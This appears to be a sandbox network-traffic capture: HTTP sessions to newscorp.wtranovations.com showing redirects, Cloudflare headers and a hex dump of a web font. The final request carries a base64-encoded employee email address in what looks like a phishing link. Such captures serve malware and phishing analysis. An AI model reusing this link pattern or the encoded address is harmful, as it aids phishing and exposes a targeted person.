                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2FKEKIXzGo6sCz6nUm%2FQljmNNuP%2FPo4WO%2F%2B101y6RGyb4wPfhE%2BI%2B9volq9tpr1Iopp5NTP8iougEWmwC4BZhAc3%2FlclGLb98jcCjN27oIEFX9OuneZVFK1RKtGAhBfKphH3xKMf3S%2FPvyht2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=49&min_rtt=49&rtt_var=24&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=584&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      CF-RAY: 923e23f18a78a68d-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      45192.168.11.1249421104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:15 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 9
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23f1dce06db3-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127394&min_rtt=127254&rtt_var=27054&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=948&delivery_rate=31624&cwnd=252&unsent_bytes=0&cid=1b3f64ed48bf527a&ts=317&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      46192.168.11.1249423104.17.24.14443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC384OUTGET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                                                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:16 GMT
                                                                                                                                                                                                                      Content-Type: application/octet-stream; charset=utf-8
                                                                                                                                                                                                                      Content-Length: 125064
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                      ETag: "619c057b-1e888"
                                                                                                                                                                                                                      Last-Modified: Mon, 22 Nov 2021 21:02:51 GMT
                                                                                                                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 90301
                                                                                                                                                                                                                      Expires: Wed, 11 Mar 2026 14:29:16 GMT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vr7t%2FG8f7HcxYY%2Fz4ujZy7KkCRUSj1pUEJZpYrNUQ%2BDsbUFJnrvkGZ3vuqo8ePqCDiYjXdt%2FXhKYidm0lE3LxJOYmNi%2BswQEcBc0FARbacQdmK0CW09Y4rmt%2BKusQbJvITJlFzwg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23f77b48afa7-ATL
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC387INData Raw: 77 4f 46 32 00 01 00 00 00 01 e8 88 00 0a 00 00 00 04 52 ec 00 01 e8 3d 03 00 00 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 a2 6c 00 81 87 64 ca 8f ce 18 cb a2 70 05 88 18 07 20 a5 75 29 92 d1 01 c0 18 9c 07 00 80 b5 fa 79 18 91 a4 16 7b 58 47 f4 ac f6 e2 01 50 55 55 55 d5 8c 84 c0 0e 55 0d 00 fc 7f f0 a3 9f fc ec 17 bf fa cd ef fe f0 a7 bf fc ed 1f ff fa 8f ff fa 9f ff fb eb c0 c1 f5 0f d3 b2 1d d7 f3 0d ff 91 dc bf e7 ce 7b 1f de c8 1b b8 87 27 52 25 a8 9a a0 ea a4 12 de 14 1d 54 a5 29 55 65 ed 29 ef 0b 64 7e 4f ea cd c2 e6 c9 3c ed a4 33 52 ad 68 43 1a fa 53 33 cf 11 02 69 67 16 7d d7 5b 11 bb 02 ef cd 04 a0 1e e3 2f d3 5f c2 4e 6f 78 4e c0 a1 d9 7e 2f 90 ab 99 c0 7f bd 1c ef 9d b7 7b 5e 68 7d 26 29 89 0a
                                                                                                                                                                                                                      Data Ascii: wOF2R=C8$ `ldp u)y{XGPUUUU{'R%T)Ue)d~O<3RhCS3ig}[/_NoxN~/{^h}&)
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: e9 52 1f 69 24 cd ee 6a 77 25 ad 56 d2 be b2 bb 7a af db cf 65 dd ba ec 0e 6e 6b 0c d8 18 f0 13 dd 98 00 0f 88 c1 24 04 2f 90 04 48 e3 41 1a 29 60 39 ad 3e 42 f2 3f e1 27 f1 92 4a fa 4b f2 7f 20 f9 41 ef e7 71 6a f5 de b7 65 e9 4b fa 02 34 25 96 ad d8 8a 03 26 45 96 93 b4 13 95 d3 66 20 1d cc b0 87 38 4b ec 2e 61 96 d8 7b 38 bc 39 62 1d 71 f7 08 7d c4 bd 25 50 7e 9e 66 6a f3 3e d0 cc ff 03 24 e0 59 69 96 b4 92 56 2b cd da bb f6 ca 40 89 93 d8 4e 13 d7 c1 0d b4 4d d3 60 53 17 28 5b 4a db c3 1c 16 c8 77 5c f6 11 6f 0e 0a e8 1e 61 7a 84 39 22 19 fe 01 98 ba de 8f d8 d2 2d 6d a4 96 f6 d2 36 95 6d c9 b4 ed 32 6f 77 81 65 ac 37 02 4c 3a 0f e6 19 97 83 cd 83 f7 20 30 b1 00 b3 1b c1 03 84 bb 49 f1 dc 61 3d 5c 8b 17 f3 e2 f0 ff 00 db cf f3 2e 18 d5 cc 4e 8c 6e b6
                                                                                                                                                                                                                      Data Ascii: Ri$jw%Vzenk$/HA)`9>B?'JK AqjeK4%&Ef 8K.a{89bq}%P~fj>$YiV+@NM`S([Jw\oaz9"-m6m2owe7L: 0Ia=\.Nn
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: 54 fe ea bc f0 d7 53 36 9e 3f c9 87 71 5e fd e4 f4 65 2c fa 5a 1e 35 1e ca a7 db 51 da a0 96 6b 79 b1 51 6b f2 dc 14 f4 de 5b ea 62 ae ce 6b 8f e7 02 0d 93 2f 6a 9f 62 2f 2d db 68 64 ac 04 31 16 ad 53 9e 1b 83 7e 5f ba 40 b6 23 0e ad d3 a3 98 d7 ca e3 d5 d4 55 e2 55 43 5b ad 5b 36 d7 58 98 ca 9a 7e ae 87 f7 96 d4 ed ef cb 33 20 ff 07 b6 bf dc f7 97 02 37 01 62 cf 47 85 1e 69 c8 51 ec 4d 85 ac 45 9e 98 7c 55 bc fa e4 b8 d1 53 bd 7f a0 79 aa 33 18 37 31 ab 68 ea 4c a6 d7 b7 3d 8b c0 59 98 8a ae 41 bf 1f 4d d8 4e c2 07 51 9c 54 7a d7 2a 3e 83 b8 8a 8d ab 7e bd f8 16 cf e0 de fe 1c e4 43 b1 ce 40 e6 ab f7 45 b5 fe ac b3 fd 92 c8 21 83 ef cb ee cb 14 d0 2e 6c 80 dd 63 4a db 73 b4 1e fa be 13 e4 8d e2 15 d8 c6 b4 fb e8 eb ed 7d 7a ff 4d 23 27 63 f2 99 7c ea 6b
                                                                                                                                                                                                                      Data Ascii: TS6?q^e,Z5QkyQk[bk/jb/-hd1S~_@#UUC[[6X~3 7bGiQME|USy371hL=YAMNQTz*>~C@E!.lcJs}zM#'c|k
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: 26 d0 44 9a 52 d3 6a 16 cd a5 25 b4 b4 96 d3 4a 5a 43 eb 69 43 6d a6 ad b4 8b 76 d3 7e 3a 42 c7 e8 78 9d ac d3 75 be 2e d4 e5 ba 5a d7 ea 46 dd a6 3b f5 a0 1e d5 13 7a 5a cf ea 05 bd aa 37 f5 b6 de d5 a7 fa 51 bf eb 2f 25 75 aa fa db 87 f5 91 7c 54 1f cd 47 f7 31 7c 6c 1f d7 27 f4 89 7d 56 9f cb 97 f4 55 7d 75 5f db d7 f3 ed 7c 0f 3f c4 8f f0 63 fd 24 3f c7 2f f2 67 fc 75 ff c4 7f f0 ff ff ff 0f 82 20 4d 90 2e c8 1a e4 0e 8a 07 6d 82 b6 41 bb a0 fd de 79 e2 26 af 27 bc 5e 74 52 ef de e4 79 53 e4 a8 2c 3d a2 34 63 7b 46 2a ad 2a 30 e1 4c 78 13 d1 44 32 b1 cb 61 13 ed 92 c6 94 36 65 26 2b 99 da 63 ad cf b8 ab e9 6d 46 9b 71 62 86 99 6d e6 7d 91 e5 66 b5 59 6b d6 99 dd e6 b4 b9 6d 1e 9a d7 e6 6d 99 fc 64 cc aa 3d 02 44 46 14 44 47 0c c4 2e 23 89 45 6a a4 43
                                                                                                                                                                                                                      Data Ascii: &DRj%JZCiCmv~:Bxu.ZF;zZ7Q/%u|TG1|l'}VU}u_|?c$?/gu M.mAy&'^tRyS,=4c{F**0LxD2a6e&+cmFqbm}fYkmmd=DFDG.#EjC
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: 1d 27 09 04 ff c2 d8 18 28 ef 7f 49 f0 1f 14 a7 28 03 c8 1b 1b c6 aa b4 8d 55 c9 18 4b c6 8a b1 74 f4 98 31 c6 18 63 46 fe 53 9a 5e 74 a1 0b 17 b9 ca 55 4e 72 9a d3 be 92 b6 d4 a5 36 35 b9 cf 45 ae 72 91 93 1c e5 a4 ff 27 c1 67 72 d9 4f fa 63 aa 53 9d ea 94 a5 2a a5 a9 4c 65 7f e5 2f 28 4f 5a 86 f2 90 d3 5c f4 dd ec 67 3c 97 d9 cb 4c 5f ed 2b 7d b9 df f4 95 6c 26 2b 59 a9 c9 58 46 7a 6d af e9 35 bd 3a a3 99 6c ef c8 4d 4e 2f 4d 66 7b 67 6f ec ae dd f6 ec f6 d0 13 68 4b 41 f2 92 96 f2 94 f5 b1 2e 49 2a 4f b1 df 92 ad fe 40 ce 06 e6 4a 5e 5c f2 f9 be 58 72 01 0e e4 63 25 97 fd bb cb 36 db e6 f6 a3 a5 25 2b ca f8 50 f6 d7 fe 4a d6 f9 6e db 68 5d fe af 68 db 75 79 8a 8f b7 c1 36 9c f3 43 85 ed bc dd 5c e3 a1 f2 92 2d ed bd b0 b4 75 b6 ce 92 15 3c 5e 99 24 85
                                                                                                                                                                                                                      Data Ascii: '(I(UKt1cFS^tUNr65Er'grOcS*Le/(OZ\g<L_+}l&+YXFzm5:lMN/Mf{gohKA.I*O@J^\Xrc%6%+PJnh]huy6C\-u<^$
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: be a3 7e 80 18 a0 7e 85 f2 00 f5 6b e4 6b d4 3f d0 1a 43 fd 1b e5 31 ea 7f 2e 3f bf b5 3c b5 87 18 ea 0b 69 af e9 65 df b6 4e 09 76 10 20 f6 a1 37 0e 62 7a 7a e3 a2 bc 44 6f 3c e4 60 7a e3 23 c7 a3 37 11 72 09 7a 93 a0 ac 4b 6f 52 94 75 e8 4d 06 27 d1 9b 5c 82 9d 02 e0 64 7a 7d 12 ec 28 40 39 8f 5e 07 e5 5e 7a 33 c1 20 7a 8b 22 e7 e1 43 cc b2 b2 04 bb 26 48 5e 76 6d 40 b3 18 b3 6c 00 13 32 cb 86 f2 b4 1b c1 8c ef df 70 b3 6c 02 f2 b4 3b 02 9c ce 2c 17 c1 c8 cc 72 31 7c c9 2c 97 a0 e9 98 6d 41 34 db 30 db 42 68 b6 66 8e b1 d0 ac c7 1c 53 a0 39 86 39 a6 94 60 67 04 c4 06 cc b1 2e 9c 41 3b 12 cc 4b bb dc 10 cd 47 bb 19 ed c1 98 9f f6 24 da 93 b1 2e ed 25 b4 97 62 7d da cb 0b 6c 48 7b 1b 6c 44 7b 27 6c 4c fb 20 6c 42 fb 29 6c 4a fb 4d 86 cd 68 87 68 87 b1 39
                                                                                                                                                                                                                      Data Ascii: ~~kk?C1.?<ieNv 7bzzDo<`z#7rzKoRuM'\dz}(@9^^z3 z"C&H^vm@l2pl;,r1|,mA40BhfS99`g.A;KG$.%b}lH{lD{'lL lB)lJMhh9
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: 69 73 34 b8 99 36 2f 6d be 63 25 3d 6d 3d da 86 39 81 6b 1b 37 88 75 68 9b 65 c4 ba b4 2d 68 5b 12 eb d1 0e 07 86 cc 4b 3b 22 63 c8 7c b4 63 68 c7 12 1b d0 4e 03 62 23 da d5 0d b1 31 ed 11 da a3 f9 b7 6b 8f 13 b1 19 ed 69 c4 e6 b4 e7 11 5b d0 5e 46 6c 49 7b 1d b1 15 ed 63 c4 d6 b4 cf 10 db d0 be 46 6c 4b fb 19 b1 1d ed 1f c4 f6 b4 ff 62 70 0a ed ff 88 1d a8 61 10 3b 52 a3 21 76 a2 a6 40 ec 4c 4d d5 10 bb 50 73 52 73 d5 1b 5d cd c3 86 d8 9d 9a 9f 5a e0 ec 8b ab 85 88 d8 8b 5a 14 b1 37 b5 38 62 1f 6a 49 c4 be d4 d2 88 fd a8 65 11 fb 53 2b 22 0e a0 56 41 1c 48 ad 86 38 88 5a 13 71 30 b5 5e 43 1c 42 6d 44 6d 5c b7 71 b5 29 33 e2 70 6a 73 6a 0b e2 08 6a 1b b4 8c a3 a8 ed a8 9d 89 a3 a9 dd a8 3d 88 13 a9 bd 90 11 a7 50 fb 52 fb 13 a7 52 07 a3 61 c8 22 d4 21 d4
                                                                                                                                                                                                                      Data Ascii: is46/mc%=m=9k7uhe-h[K;"c|chNb#1ki[^FlI{cFlKbpa;R!v@LMPsRs]ZZ78bjIeS+"VAH8Zq0^CBmDm\q)3pjsjj=PRRa"!
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: 85 62 37 88 6e 41 b1 17 a4 18 88 e2 78 08 ff a2 38 09 62 fb a1 38 99 fa e5 1a 42 8a 7e 28 ae 83 58 23 14 77 40 c2 40 14 f7 81 84 07 51 dc 17 62 9d 51 3c 0c c2 c7 28 1e 0e d1 ab 28 9e 01 d1 95 28 9e 03 09 77 a0 78 1e 24 2c 43 f1 62 08 27 a1 78 09 44 fb a0 78 0d 84 cb 51 bc 16 12 12 8a 37 41 ec 74 14 6f 87 84 f7 51 bc 0b c2 b1 28 3e 0a 09 5b 50 7c 0c a2 b9 28 3e 0e 29 f6 40 f1 09 88 7d 8a e2 53 10 9b 81 e2 d3 10 fe 46 f1 59 48 38 00 c5 e7 21 b6 19 c5 97 20 fa 04 c5 57 21 e1 30 14 df c0 c7 02 eb f8 26 21 f6 21 8a 6f 43 6c 07 8a ef 41 ec 7c 14 3f 80 d8 f5 28 7e 0a e1 5c 14 3f 87 e8 1a 14 bf 82 68 10 8a df 42 6c 34 8a 3f 40 c2 bf 28 26 08 97 a1 f8 07 84 6b 51 aa 0c b1 a7 51 aa 02 b1 97 50 aa 09 b1 77 51 6a 00 b1 17 51 da 05 62 1d 50 1a 0a e1 33 94 26 42 74 1a
                                                                                                                                                                                                                      Data Ascii: b7nAx8b8B~(X#w@@QbQ<(((wx$,Cb'xDxQ7AtoQ(>[P|(>)@}SFYH8! W!0&!!oClA|?(~\?hBl4?@(&kQQPwQjQbP3&Bt
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: a1 78 0c 12 3d 91 50 6c 20 b1 87 08 8f 7c 2e 24 f6 a5 84 47 3e 0f 12 ae 10 1e 59 40 a2 80 f0 c8 37 43 32 fe 9c f0 c8 f7 42 62 1b c2 23 bf 0e 89 bd 8d f0 c8 1f e2 31 c4 af 1f b2 88 2e 56 58 60 45 3e d5 a9 45 3d 1a 12 a1 cf 05 17 5e 18 85 51 3f cb b3 dc 4b d2 24 2d 23 9d 8a 48 78 b5 3c 8a f3 34 f7 70 ba 39 f7 b5 0b b8 da 47 cf d7 2e e0 6a 3f 7b f1 8b 7e e5 bf 5e fc e2 f4 45 2f fe 95 ff 7c d1 8b b0 82 ab fd cd 99 af a7 9d 59 26 cc bf e2 2b ae 7c c5 57 40 6d 7e bb 47 6f 3e 76 d3 92 cf 60 fd e2 01 bd 01 4b aa d1 88 28 9f e4 e3 6c e6 9d a4 49 3c 10 bc 0d 3f 0a a7 c1 40 8c 79 e0 47 e1 74 92 67 b3 93 34 49 e7 5a 4a 29 f5 4f 8a e7 28 e5 78 65 67 52 ba c0 14 c1 85 b6 e5 f1 d8 52 c7 51 95 8a 72 6e 6c fb 5b 64 44 17 e7 58 61 49 cf a5 17 11 21 ce b3 34 49 13 c1 cb bd
                                                                                                                                                                                                                      Data Ascii: x=Pl |.$G>Y@7C2Bb#1.VX`E>E=^Q?K$-#Hx<4p9G.j?{~^E/|Y&+|W@m~Go>v`K(lI<?@yGtg4IZJ)O(xegRRQrnl[dDXaI!4I
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1369INData Raw: 6d 6c dd de 6e 35 21 c3 15 75 22 18 fc 4d d5 a2 8d 9e f6 e3 60 df 6b e7 76 b5 54 52 86 c1 ff e4 2f 94 70 06 a0 aa 5d 2a e1 53 36 8b 8a 29 5c a5 70 6a 2c 99 72 a5 72 87 35 66 d3 87 75 68 4c 77 89 46 8a a0 12 82 ef 39 2a a8 70 92 26 47 46 5c ce 05 17 71 92 ca c0 a9 f5 89 f1 e7 0d 15 03 a3 61 d6 cb 86 23 20 ae 6b 8d d1 30 9b 67 c3 11 b4 ae 7f 41 af 18 10 3d de f1 7c b0 a0 ff e7 c3 d9 12 56 8f 86 d9 6c 58 6d 36 7a 43 4e da 6b 34 ab df 5d ba 74 dd ac 86 86 74 9a eb d0 71 cc 9c 0f a3 30 ca a2 e4 24 1d f0 b3 3c 0b 9f ad 3d a5 aa a5 02 4d e5 de 72 dc 8c d6 a9 5a 36 f5 74 eb 5d 90 32 f9 27 8b 6d 67 44 84 fb b8 4f 75 a2 d1 20 1d 25 69 96 8f b2 14 47 bb e8 fe 5f 3c c6 2b 84 d8 ac 2a 80 87 b9 52 4a 58 a6 a9 36 8f 80 2b d3 b4 6c 9f 8c a5 5d ab d9 4b cb 34 95 52 4a 7c
                                                                                                                                                                                                                      Data Ascii: mln5!u"M`kvTR/p]*S6)\pj,rr5fuhLwF9*p&GF\qa# k0gA=|VlXm6zCNk4]ttq0$<=MrZ6t]2'mgDOu %iG_<+*RJX6+l]K4RJ|


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      47192.168.11.1249422104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC339OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC1164INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:16 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:16 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/favicon.ico
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wRFld%2BI2zNoZK6AQNT997CNZw8zM%2BngQYdfmd%2F2jsIYz7uYTD%2FcU6mFY%2Fe7KUN1QCh7qAMnbra5e5tF6Ll3zbvYfHlAv3mbFbYCLBKZSENXMndsL%2FLXyp0bIJDFQOyUKvXtt6HsH7YT%2Bxs4HkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=122&min_rtt=122&rtt_var=61&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: MISS
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23f7ad8ced31-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=128868&min_rtt=128845&rtt_var=27211&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=917&delivery_rate=31309&cwnd=252&unsent_bytes=0&cid=51a045fa3d106ea7&ts=346&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      48192.168.11.1249424104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:16 UTC395OUTGET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      User-Agent: com.apple.Safari.SearchHelper/14606.3.4 CFNetwork/976 Darwin/18.2.0 (x86_64)
